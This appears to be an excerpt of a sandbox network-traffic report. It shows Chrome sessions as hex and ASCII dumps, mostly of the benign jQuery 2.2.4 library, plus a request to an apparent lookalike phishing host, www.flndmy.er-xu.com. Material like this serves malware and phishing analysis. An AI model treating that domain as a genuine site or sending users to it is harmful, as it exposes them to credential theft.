2025-01-13 00:49:32 UTC	1378	IN	Data Raw: 72 69 63 74 22 3b 0a 76 61 72 20 61 72 72 20 3d 20 5b 5d 3b 0a 0a 76 61 72 20 64 6f 63 75 6d 65 6e 74 20 3d 20 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 0a 0a 76 61 72 20 73 6c 69 63 65 20 3d 20 61 72 72 2e 73 6c 69 63 65 3b 0a 0a 76 61 72 20 63 6f 6e 63 61 74 20 3d 20 61 72 72 2e 63 6f 6e 63 61 74 3b 0a 0a 76 61 72 20 70 75 73 68 20 3d 20 61 72 72 2e 70 75 73 68 3b 0a 0a 76 61 72 20 69 6e 64 65 78 4f 66 20 3d 20 61 72 72 2e 69 6e 64 65 78 4f 66 3b 0a 0a 76 61 72 20 63 6c 61 73 73 32 74 79 70 65 20 3d 20 7b 7d 3b 0a 0a 76 61 72 20 74 6f 53 74 72 69 6e 67 20 3d 20 63 6c 61 73 73 32 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3b 0a 0a 76 61 72 20 68 61 73 4f 77 6e 20 3d 20 63 6c 61 73 73 32 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 0a 0a Data Ascii: rict";var arr = [];var document = window.document;var slice = arr.slice;var concat = arr.concat;var push = arr.push;var indexOf = arr.indexOf;var class2type = {};var toString = class2type.toString;var hasOwn = class2type.hasOwnProperty;
2025-01-13 00:49:32 UTC	1378	IN	Data Raw: 75 73 74 20 74 68 65 20 6f 6e 65 20 65 6c 65 6d 65 6e 74 20 66 72 6f 6d 20 74 68 65 20 73 65 74 0a 09 09 09 28 20 6e 75 6d 20 3c 20 30 20 3f 20 74 68 69 73 5b 20 6e 75 6d 20 2b 20 74 68 69 73 2e 6c 65 6e 67 74 68 20 5d 20 3a 20 74 68 69 73 5b 20 6e 75 6d 20 5d 20 29 20 3a 0a 0a 09 09 09 2f 2f 20 52 65 74 75 72 6e 20 61 6c 6c 20 74 68 65 20 65 6c 65 6d 65 6e 74 73 20 69 6e 20 61 20 63 6c 65 61 6e 20 61 72 72 61 79 0a 09 09 09 73 6c 69 63 65 2e 63 61 6c 6c 28 20 74 68 69 73 20 29 3b 0a 09 7d 2c 0a 0a 09 2f 2f 20 54 61 6b 65 20 61 6e 20 61 72 72 61 79 20 6f 66 20 65 6c 65 6d 65 6e 74 73 20 61 6e 64 20 70 75 73 68 20 69 74 20 6f 6e 74 6f 20 74 68 65 20 73 74 61 63 6b 0a 09 2f 2f 20 28 72 65 74 75 72 6e 69 6e 67 20 74 68 65 20 6e 65 77 20 6d 61 74 63 68 65 64 Data Ascii: ust the one element from the set( num < 0 ? this[ num + this.length ] : this[ num ] ) :// Return all the elements in a clean arrayslice.call( this );},// Take an array of elements and push it onto the stack// (returning the new matched
2025-01-13 00:49:32 UTC	1378	IN	Data Raw: 2e 73 6f 72 74 2c 0a 09 73 70 6c 69 63 65 3a 20 61 72 72 2e 73 70 6c 69 63 65 0a 7d 3b 0a 0a 6a 51 75 65 72 79 2e 65 78 74 65 6e 64 20 3d 20 6a 51 75 65 72 79 2e 66 6e 2e 65 78 74 65 6e 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 76 61 72 20 6f 70 74 69 6f 6e 73 2c 20 6e 61 6d 65 2c 20 73 72 63 2c 20 63 6f 70 79 2c 20 63 6f 70 79 49 73 41 72 72 61 79 2c 20 63 6c 6f 6e 65 2c 0a 09 09 74 61 72 67 65 74 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 20 30 20 5d 20 7c 7c 20 7b 7d 2c 0a 09 09 69 20 3d 20 31 2c 0a 09 09 6c 65 6e 67 74 68 20 3d 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 0a 09 09 64 65 65 70 20 3d 20 66 61 6c 73 65 3b 0a 0a 09 2f 2f 20 48 61 6e 64 6c 65 20 61 20 64 65 65 70 20 63 6f 70 79 20 73 69 74 75 61 74 69 6f 6e 0a 09 69 66 20 Data Ascii: .sort,splice: arr.splice};jQuery.extend = jQuery.fn.extend = function() {var options, name, src, copy, copyIsArray, clone,target = arguments[ 0 ] \|\| {},i = 1,length = arguments.length,deep = false;// Handle a deep copy situationif
2025-01-13 00:49:32 UTC	1378	IN	Data Raw: 20 63 6c 6f 6e 65 20 74 68 65 6d 0a 09 09 09 09 09 74 61 72 67 65 74 5b 20 6e 61 6d 65 20 5d 20 3d 20 6a 51 75 65 72 79 2e 65 78 74 65 6e 64 28 20 64 65 65 70 2c 20 63 6c 6f 6e 65 2c 20 63 6f 70 79 20 29 3b 0a 0a 09 09 09 09 2f 2f 20 44 6f 6e 27 74 20 62 72 69 6e 67 20 69 6e 20 75 6e 64 65 66 69 6e 65 64 20 76 61 6c 75 65 73 0a 09 09 09 09 7d 20 65 6c 73 65 20 69 66 20 28 20 63 6f 70 79 20 21 3d 3d 20 75 6e 64 65 66 69 6e 65 64 20 29 20 7b 0a 09 09 09 09 09 74 61 72 67 65 74 5b 20 6e 61 6d 65 20 5d 20 3d 20 63 6f 70 79 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 0a 09 7d 0a 0a 09 2f 2f 20 52 65 74 75 72 6e 20 74 68 65 20 6d 6f 64 69 66 69 65 64 20 6f 62 6a 65 63 74 0a 09 72 65 74 75 72 6e 20 74 61 72 67 65 74 3b 0a 7d 3b 0a 0a 6a 51 75 65 72 79 2e 65 Data Ascii: clone themtarget[ name ] = jQuery.extend( deep, clone, copy );// Don't bring in undefined values} else if ( copy !== undefined ) {target[ name ] = copy;}}}}// Return the modified objectreturn target;};jQuery.e
2025-01-13 00:49:32 UTC	1378	IN	Data Raw: 63 74 22 20 7c 7c 20 6f 62 6a 2e 6e 6f 64 65 54 79 70 65 20 7c 7c 20 6a 51 75 65 72 79 2e 69 73 57 69 6e 64 6f 77 28 20 6f 62 6a 20 29 20 29 20 7b 0a 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 7d 0a 0a 09 09 2f 2f 20 4e 6f 74 20 6f 77 6e 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 70 72 6f 70 65 72 74 79 20 6d 75 73 74 20 62 65 20 4f 62 6a 65 63 74 0a 09 09 69 66 20 28 20 6f 62 6a 2e 63 6f 6e 73 74 72 75 63 74 6f 72 20 26 26 0a 09 09 09 09 21 68 61 73 4f 77 6e 2e 63 61 6c 6c 28 20 6f 62 6a 2c 20 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 20 29 20 26 26 0a 09 09 09 09 21 68 61 73 4f 77 6e 2e 63 61 6c 6c 28 20 6f 62 6a 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 70 72 6f 74 6f 74 79 70 65 20 7c 7c 20 7b 7d 2c 20 22 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 22 Data Ascii: ct" \|\| obj.nodeType \|\| jQuery.isWindow( obj ) ) {return false;}// Not own constructor property must be Objectif ( obj.constructor &&!hasOwn.call( obj, "constructor" ) &&!hasOwn.call( obj.constructor.prototype \|\| {}, "isPrototypeOf"
2025-01-13 00:49:32 UTC	1378	IN	Data Raw: 69 73 65 2c 20 61 76 6f 69 64 20 74 68 65 20 44 4f 4d 20 6e 6f 64 65 20 63 72 65 61 74 69 6f 6e 2c 20 69 6e 73 65 72 74 69 6f 6e 0a 09 09 09 09 2f 2f 20 61 6e 64 20 72 65 6d 6f 76 61 6c 20 62 79 20 75 73 69 6e 67 20 61 6e 20 69 6e 64 69 72 65 63 74 20 67 6c 6f 62 61 6c 20 65 76 61 6c 0a 0a 09 09 09 09 69 6e 64 69 72 65 63 74 28 20 63 6f 64 65 20 29 3b 0a 09 09 09 7d 0a 09 09 7d 0a 09 7d 2c 0a 0a 09 2f 2f 20 43 6f 6e 76 65 72 74 20 64 61 73 68 65 64 20 74 6f 20 63 61 6d 65 6c 43 61 73 65 3b 20 75 73 65 64 20 62 79 20 74 68 65 20 63 73 73 20 61 6e 64 20 64 61 74 61 20 6d 6f 64 75 6c 65 73 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 49 45 39 2d 31 31 2b 0a 09 2f 2f 20 4d 69 63 72 6f 73 6f 66 74 20 66 6f 72 67 6f 74 20 74 6f 20 68 75 6d 70 20 74 68 65 69 72 20 Data Ascii: ise, avoid the DOM node creation, insertion// and removal by using an indirect global evalindirect( code );}}},// Convert dashed to camelCase; used by the css and data modules// Support: IE9-11+// Microsoft forgot to hump their
2025-01-13 00:49:32 UTC	1378	IN	Data Raw: 3d 20 6e 75 6c 6c 20 3f 20 2d 31 20 3a 20 69 6e 64 65 78 4f 66 2e 63 61 6c 6c 28 20 61 72 72 2c 20 65 6c 65 6d 2c 20 69 20 29 3b 0a 09 7d 2c 0a 0a 09 6d 65 72 67 65 3a 20 66 75 6e 63 74 69 6f 6e 28 20 66 69 72 73 74 2c 20 73 65 63 6f 6e 64 20 29 20 7b 0a 09 09 76 61 72 20 6c 65 6e 20 3d 20 2b 73 65 63 6f 6e 64 2e 6c 65 6e 67 74 68 2c 0a 09 09 09 6a 20 3d 20 30 2c 0a 09 09 09 69 20 3d 20 66 69 72 73 74 2e 6c 65 6e 67 74 68 3b 0a 0a 09 09 66 6f 72 20 28 20 3b 20 6a 20 3c 20 6c 65 6e 3b 20 6a 2b 2b 20 29 20 7b 0a 09 09 09 66 69 72 73 74 5b 20 69 2b 2b 20 5d 20 3d 20 73 65 63 6f 6e 64 5b 20 6a 20 5d 3b 0a 09 09 7d 0a 0a 09 09 66 69 72 73 74 2e 6c 65 6e 67 74 68 20 3d 20 69 3b 0a 0a 09 09 72 65 74 75 72 6e 20 66 69 72 73 74 3b 0a 09 7d 2c 0a 0a 09 67 72 65 70 Data Ascii: = null ? -1 : indexOf.call( arr, elem, i );},merge: function( first, second ) {var len = +second.length,j = 0,i = first.length;for ( ; j < len; j++ ) {first[ i++ ] = second[ j ];}first.length = i;return first;},grep
2025-01-13 00:49:32 UTC	1378	IN	Data Raw: 2c 0a 0a 09 2f 2f 20 42 69 6e 64 20 61 20 66 75 6e 63 74 69 6f 6e 20 74 6f 20 61 20 63 6f 6e 74 65 78 74 2c 20 6f 70 74 69 6f 6e 61 6c 6c 79 20 70 61 72 74 69 61 6c 6c 79 20 61 70 70 6c 79 69 6e 67 20 61 6e 79 0a 09 2f 2f 20 61 72 67 75 6d 65 6e 74 73 2e 0a 09 70 72 6f 78 79 3a 20 66 75 6e 63 74 69 6f 6e 28 20 66 6e 2c 20 63 6f 6e 74 65 78 74 20 29 20 7b 0a 09 09 76 61 72 20 74 6d 70 2c 20 61 72 67 73 2c 20 70 72 6f 78 79 3b 0a 0a 09 09 69 66 20 28 20 74 79 70 65 6f 66 20 63 6f 6e 74 65 78 74 20 3d 3d 3d 20 22 73 74 72 69 6e 67 22 20 29 20 7b 0a 09 09 09 74 6d 70 20 3d 20 66 6e 5b 20 63 6f 6e 74 65 78 74 20 5d 3b 0a 09 09 09 63 6f 6e 74 65 78 74 20 3d 20 66 6e 3b 0a 09 09 09 66 6e 20 3d 20 74 6d 70 3b 0a 09 09 7d 0a 0a 09 09 2f 2f 20 51 75 69 63 6b 20 63 Data Ascii: ,// Bind a function to a context, optionally partially applying any// arguments.proxy: function( fn, context ) {var tmp, args, proxy;if ( typeof context === "string" ) {tmp = fn[ context ];context = fn;fn = tmp;}// Quick c
2025-01-13 00:49:32 UTC	1378	IN	Data Raw: 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 20 22 20 22 20 29 2c 0a 66 75 6e 63 74 69 6f 6e 28 20 69 2c 20 6e 61 6d 65 20 29 20 7b 0a 09 63 6c 61 73 73 32 74 79 70 65 5b 20 22 5b 6f 62 6a 65 63 74 20 22 20 2b 20 6e 61 6d 65 20 2b 20 22 5d 22 20 5d 20 3d 20 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 0a 7d 20 29 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 69 73 41 72 72 61 79 4c 69 6b 65 28 20 6f 62 6a 20 29 20 7b 0a 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 69 4f 53 20 38 2e 32 20 28 6e 6f 74 20 72 65 70 72 6f 64 75 63 69 62 6c 65 20 69 6e 20 73 69 6d 75 6c 61 74 6f 72 29 0a 09 2f 2f 20 60 69 6e 60 20 63 68 Data Ascii: r String Function Array Date RegExp Object Error Symbol".split( " " ),function( i, name ) {class2type[ "[object " + name + "]" ] = name.toLowerCase();} );function isArrayLike( obj ) {// Support: iOS 8.2 (not reproducible in simulator)// `in` ch

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	53582	151.101.66.137	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:34 UTC	354	OUT	GET /jquery-2.2.4.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 00:49:34 UTC	611	IN	HTTP/1.1 200 OK Connection: close Content-Length: 257551 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-3ee0f" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Mon, 13 Jan 2025 00:49:34 GMT Age: 751312 X-Served-By: cache-lga21969-LGA, cache-ewr-kewr1740065-EWR X-Cache: HIT, HIT X-Cache-Hits: 69, 1 X-Timer: S1736729374.080090,VS0,VE2 Vary: Accept-Encoding
2025-01-13 00:49:34 UTC	16384	IN	Data Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 32 2e 32 2e 34 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 2a 20 68 74 74 70 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 31 36 2d 30 35 2d 32 30 54 31 Data Ascii: /! jQuery JavaScript Library v2.2.4 * http://jquery.com/ * * Includes Sizzle.js * http://sizzlejs.com/ * * Copyright jQuery Foundation and other contributors * Released under the MIT license * http://jquery.org/license * * Date: 2016-05-20T1
2025-01-13 00:49:34 UTC	16384	IN	Data Raw: 65 67 45 78 70 28 20 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 20 2b 20 77 68 69 74 65 73 70 61 63 65 20 2b 0a 09 09 09 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 20 2b 20 77 68 69 74 65 73 70 61 63 65 20 2b 20 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 20 2b 20 77 68 69 74 65 73 70 61 63 65 20 2b 0a 09 09 09 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 20 2b 20 77 68 69 74 65 73 70 61 63 65 20 2b 20 22 2a 5c 5c 29 7c 29 22 2c 20 22 69 22 20 29 2c 0a 09 09 22 62 6f 6f 6c 22 3a 20 6e 65 77 20 52 65 67 45 78 70 28 20 22 5e 28 3f 3a 22 20 2b 20 62 6f 6f 6c 65 61 6e 73 20 2b 20 22 29 24 22 2c 20 22 69 Data Ascii: egExp( "^:(only\|first\|last\|nth\|nth-last)-(child\|of-type)(?:\$" + whitespace +"(even\|odd\|(([+-]\|)(\\d)n\|)" + whitespace + "(?:([+-]\|)" + whitespace +"(\\d+)\|))" + whitespace + "*\$\|)", "i" ),"bool": new RegExp( "^(?:" + booleans + ")$", "i
2025-01-13 00:49:34 UTC	16384	IN	Data Raw: 20 65 78 70 61 6e 64 6f 20 2b 20 22 2b 2a 22 20 29 2e 6c 65 6e 67 74 68 20 29 20 7b 0a 09 09 09 09 72 62 75 67 67 79 51 53 41 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 3b 0a 09 09 09 7d 0a 09 09 7d 29 3b 0a 0a 09 09 61 73 73 65 72 74 28 66 75 6e 63 74 69 6f 6e 28 20 64 69 76 20 29 20 7b 0a 09 09 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 57 69 6e 64 6f 77 73 20 38 20 4e 61 74 69 76 65 20 41 70 70 73 0a 09 09 09 2f 2f 20 54 68 65 20 74 79 70 65 20 61 6e 64 20 6e 61 6d 65 20 61 74 74 72 69 62 75 74 65 73 20 61 72 65 20 72 65 73 74 72 69 63 74 65 64 20 64 75 72 69 6e 67 20 2e 69 6e 6e 65 72 48 54 4d 4c 20 61 73 73 69 67 6e 6d 65 6e 74 0a 09 09 09 76 61 72 20 69 6e 70 75 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 Data Ascii: expando + "+*" ).length ) {rbuggyQSA.push(".#.+[+~]");}});assert(function( div ) {// Support: Windows 8 Native Apps// The type and name attributes are restricted during .innerHTML assignmentvar input = document.createElement("
2025-01-13 00:49:34 UTC	16384	IN	Data Raw: 2f 73 65 6c 65 63 74 6f 72 73 2f 23 70 73 65 75 64 6f 2d 63 6c 61 73 73 65 73 0a 09 09 09 2f 2f 20 50 72 69 6f 72 69 74 69 7a 65 20 62 79 20 63 61 73 65 20 73 65 6e 73 69 74 69 76 69 74 79 20 69 6e 20 63 61 73 65 20 63 75 73 74 6f 6d 20 70 73 65 75 64 6f 73 20 61 72 65 20 61 64 64 65 64 20 77 69 74 68 20 75 70 70 65 72 63 61 73 65 20 6c 65 74 74 65 72 73 0a 09 09 09 2f 2f 20 52 65 6d 65 6d 62 65 72 20 74 68 61 74 20 73 65 74 46 69 6c 74 65 72 73 20 69 6e 68 65 72 69 74 73 20 66 72 6f 6d 20 70 73 65 75 64 6f 73 0a 09 09 09 76 61 72 20 61 72 67 73 2c 0a 09 09 09 09 66 6e 20 3d 20 45 78 70 72 2e 70 73 65 75 64 6f 73 5b 20 70 73 65 75 64 6f 20 5d 20 7c 7c 20 45 78 70 72 2e 73 65 74 46 69 6c 74 65 72 73 5b 20 70 73 65 75 64 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 Data Ascii: /selectors/#pseudo-classes// Prioritize by case sensitivity in case custom pseudos are added with uppercase letters// Remember that setFilters inherits from pseudosvar args,fn = Expr.pseudos[ pseudo ] \|\| Expr.setFilters[ pseudo.toLowerCas
2025-01-13 00:49:34 UTC	16384	IN	Data Raw: 67 74 68 20 3e 20 30 2c 0a 09 09 73 75 70 65 72 4d 61 74 63 68 65 72 20 3d 20 66 75 6e 63 74 69 6f 6e 28 20 73 65 65 64 2c 20 63 6f 6e 74 65 78 74 2c 20 78 6d 6c 2c 20 72 65 73 75 6c 74 73 2c 20 6f 75 74 65 72 6d 6f 73 74 20 29 20 7b 0a 09 09 09 76 61 72 20 65 6c 65 6d 2c 20 6a 2c 20 6d 61 74 63 68 65 72 2c 0a 09 09 09 09 6d 61 74 63 68 65 64 43 6f 75 6e 74 20 3d 20 30 2c 0a 09 09 09 09 69 20 3d 20 22 30 22 2c 0a 09 09 09 09 75 6e 6d 61 74 63 68 65 64 20 3d 20 73 65 65 64 20 26 26 20 5b 5d 2c 0a 09 09 09 09 73 65 74 4d 61 74 63 68 65 64 20 3d 20 5b 5d 2c 0a 09 09 09 09 63 6f 6e 74 65 78 74 42 61 63 6b 75 70 20 3d 20 6f 75 74 65 72 6d 6f 73 74 43 6f 6e 74 65 78 74 2c 0a 09 09 09 09 2f 2f 20 57 65 20 6d 75 73 74 20 61 6c 77 61 79 73 20 68 61 76 65 20 65 69 Data Ascii: gth > 0,superMatcher = function( seed, context, xml, results, outermost ) {var elem, j, matcher,matchedCount = 0,i = "0",unmatched = seed && [],setMatched = [],contextBackup = outermostContext,// We must always have ei
2025-01-13 00:49:34 UTC	16384	IN	Data Raw: 6f 6e 20 6f 66 20 61 6e 20 65 6c 65 6d 65 6e 74 20 77 69 74 68 69 6e 20 74 68 65 20 73 65 74 0a 09 69 6e 64 65 78 3a 20 66 75 6e 63 74 69 6f 6e 28 20 65 6c 65 6d 20 29 20 7b 0a 0a 09 09 2f 2f 20 4e 6f 20 61 72 67 75 6d 65 6e 74 2c 20 72 65 74 75 72 6e 20 69 6e 64 65 78 20 69 6e 20 70 61 72 65 6e 74 0a 09 09 69 66 20 28 20 21 65 6c 65 6d 20 29 20 7b 0a 09 09 09 72 65 74 75 72 6e 20 28 20 74 68 69 73 5b 20 30 20 5d 20 26 26 20 74 68 69 73 5b 20 30 20 5d 2e 70 61 72 65 6e 74 4e 6f 64 65 20 29 20 3f 20 74 68 69 73 2e 66 69 72 73 74 28 29 2e 70 72 65 76 41 6c 6c 28 29 2e 6c 65 6e 67 74 68 20 3a 20 2d 31 3b 0a 09 09 7d 0a 0a 09 09 2f 2f 20 49 6e 64 65 78 20 69 6e 20 73 65 6c 65 63 74 6f 72 0a 09 09 69 66 20 28 20 74 79 70 65 6f 66 20 65 6c 65 6d 20 3d 3d 3d 20 Data Ascii: on of an element within the setindex: function( elem ) {// No argument, return index in parentif ( !elem ) {return ( this[ 0 ] && this[ 0 ].parentNode ) ? this.first().prevAll().length : -1;}// Index in selectorif ( typeof elem ===
2025-01-13 00:49:34 UTC	16384	IN	Data Raw: 61 62 6c 65 2c 20 6e 6f 6e 2d 77 72 69 74 61 62 6c 65 20 70 72 6f 70 65 72 74 79 0a 09 09 2f 2f 20 63 6f 6e 66 69 67 75 72 61 62 69 6c 69 74 79 20 6d 75 73 74 20 62 65 20 74 72 75 65 20 74 6f 20 61 6c 6c 6f 77 20 74 68 65 20 70 72 6f 70 65 72 74 79 20 74 6f 20 62 65 0a 09 09 2f 2f 20 64 65 6c 65 74 65 64 20 77 69 74 68 20 74 68 65 20 64 65 6c 65 74 65 20 6f 70 65 72 61 74 6f 72 0a 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 20 6f 77 6e 65 72 2c 20 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 20 7b 0a 09 09 09 09 76 61 6c 75 65 3a 20 76 61 6c 75 65 2c 0a 09 09 09 09 77 72 69 74 61 62 6c 65 3a 20 74 72 75 65 2c 0a 09 09 09 09 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 20 74 72 75 65 0a 09 09 09 7d 20 29 Data Ascii: able, non-writable property// configurability must be true to allow the property to be// deleted with the delete operator} else {Object.defineProperty( owner, this.expando, {value: value,writable: true,configurable: true} )
2025-01-13 00:49:34 UTC	16384	IN	Data Raw: 6f 62 61 6c 45 76 61 6c 22 20 29 0a 09 09 29 3b 0a 09 7d 0a 7d 0a 0a 0a 76 61 72 20 72 68 74 6d 6c 20 3d 20 2f 3c 7c 26 23 3f 5c 77 2b 3b 2f 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 62 75 69 6c 64 46 72 61 67 6d 65 6e 74 28 20 65 6c 65 6d 73 2c 20 63 6f 6e 74 65 78 74 2c 20 73 63 72 69 70 74 73 2c 20 73 65 6c 65 63 74 69 6f 6e 2c 20 69 67 6e 6f 72 65 64 20 29 20 7b 0a 09 76 61 72 20 65 6c 65 6d 2c 20 74 6d 70 2c 20 74 61 67 2c 20 77 72 61 70 2c 20 63 6f 6e 74 61 69 6e 73 2c 20 6a 2c 0a 09 09 66 72 61 67 6d 65 6e 74 20 3d 20 63 6f 6e 74 65 78 74 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 28 29 2c 0a 09 09 6e 6f 64 65 73 20 3d 20 5b 5d 2c 0a 09 09 69 20 3d 20 30 2c 0a 09 09 6c 20 3d 20 65 6c 65 6d 73 2e 6c 65 6e 67 74 68 3b 0a 0a 09 66 Data Ascii: obalEval" ));}}var rhtml = /<\|&#?\w+;/;function buildFragment( elems, context, scripts, selection, ignored ) {var elem, tmp, tag, wrap, contains, j,fragment = context.createDocumentFragment(),nodes = [],i = 0,l = elems.length;f
2025-01-13 00:49:34 UTC	16384	IN	Data Raw: 20 53 75 70 70 6f 72 74 3a 20 53 61 66 61 72 69 20 36 2e 30 2b 2c 20 43 68 72 6f 6d 65 3c 32 38 0a 09 09 2f 2f 20 54 61 72 67 65 74 20 73 68 6f 75 6c 64 20 6e 6f 74 20 62 65 20 61 20 74 65 78 74 20 6e 6f 64 65 20 28 23 35 30 34 2c 20 23 31 33 31 34 33 29 0a 09 09 69 66 20 28 20 65 76 65 6e 74 2e 74 61 72 67 65 74 2e 6e 6f 64 65 54 79 70 65 20 3d 3d 3d 20 33 20 29 20 7b 0a 09 09 09 65 76 65 6e 74 2e 74 61 72 67 65 74 20 3d 20 65 76 65 6e 74 2e 74 61 72 67 65 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 0a 09 09 7d 0a 0a 09 09 72 65 74 75 72 6e 20 66 69 78 48 6f 6f 6b 2e 66 69 6c 74 65 72 20 3f 20 66 69 78 48 6f 6f 6b 2e 66 69 6c 74 65 72 28 20 65 76 65 6e 74 2c 20 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 20 29 20 3a 20 65 76 65 6e 74 3b 0a 09 7d 2c 0a 0a 09 73 70 Data Ascii: Support: Safari 6.0+, Chrome<28// Target should not be a text node (#504, #13143)if ( event.target.nodeType === 3 ) {event.target = event.target.parentNode;}return fixHook.filter ? fixHook.filter( event, originalEvent ) : event;},sp
2025-01-13 00:49:34 UTC	16384	IN	Data Raw: 28 20 76 61 6c 75 65 20 29 3b 0a 09 09 09 7d 0a 09 09 7d 2c 20 6e 75 6c 6c 2c 20 76 61 6c 75 65 2c 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 20 29 3b 0a 09 7d 2c 0a 0a 09 72 65 70 6c 61 63 65 57 69 74 68 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 76 61 72 20 69 67 6e 6f 72 65 64 20 3d 20 5b 5d 3b 0a 0a 09 09 2f 2f 20 4d 61 6b 65 20 74 68 65 20 63 68 61 6e 67 65 73 2c 20 72 65 70 6c 61 63 69 6e 67 20 65 61 63 68 20 6e 6f 6e 2d 69 67 6e 6f 72 65 64 20 63 6f 6e 74 65 78 74 20 65 6c 65 6d 65 6e 74 20 77 69 74 68 20 74 68 65 20 6e 65 77 20 63 6f 6e 74 65 6e 74 0a 09 09 72 65 74 75 72 6e 20 64 6f 6d 4d 61 6e 69 70 28 20 74 68 69 73 2c 20 61 72 67 75 6d 65 6e 74 73 2c 20 66 75 6e 63 74 69 6f 6e 28 20 65 6c 65 6d 20 29 20 7b 0a 09 09 09 76 61 72 Data Ascii: ( value );}}, null, value, arguments.length );},replaceWith: function() {var ignored = [];// Make the changes, replacing each non-ignored context element with the new contentreturn domManip( this, arguments, function( elem ) {var

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	53567	89.250.71.221	443	6332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:36 UTC	575	OUT	GET /aU3V88/css/appe.css?v=1 HTTP/1.1 Host: www.flndmy.er-xu.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.flndmy.er-xu.com/aU3V88/c1.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
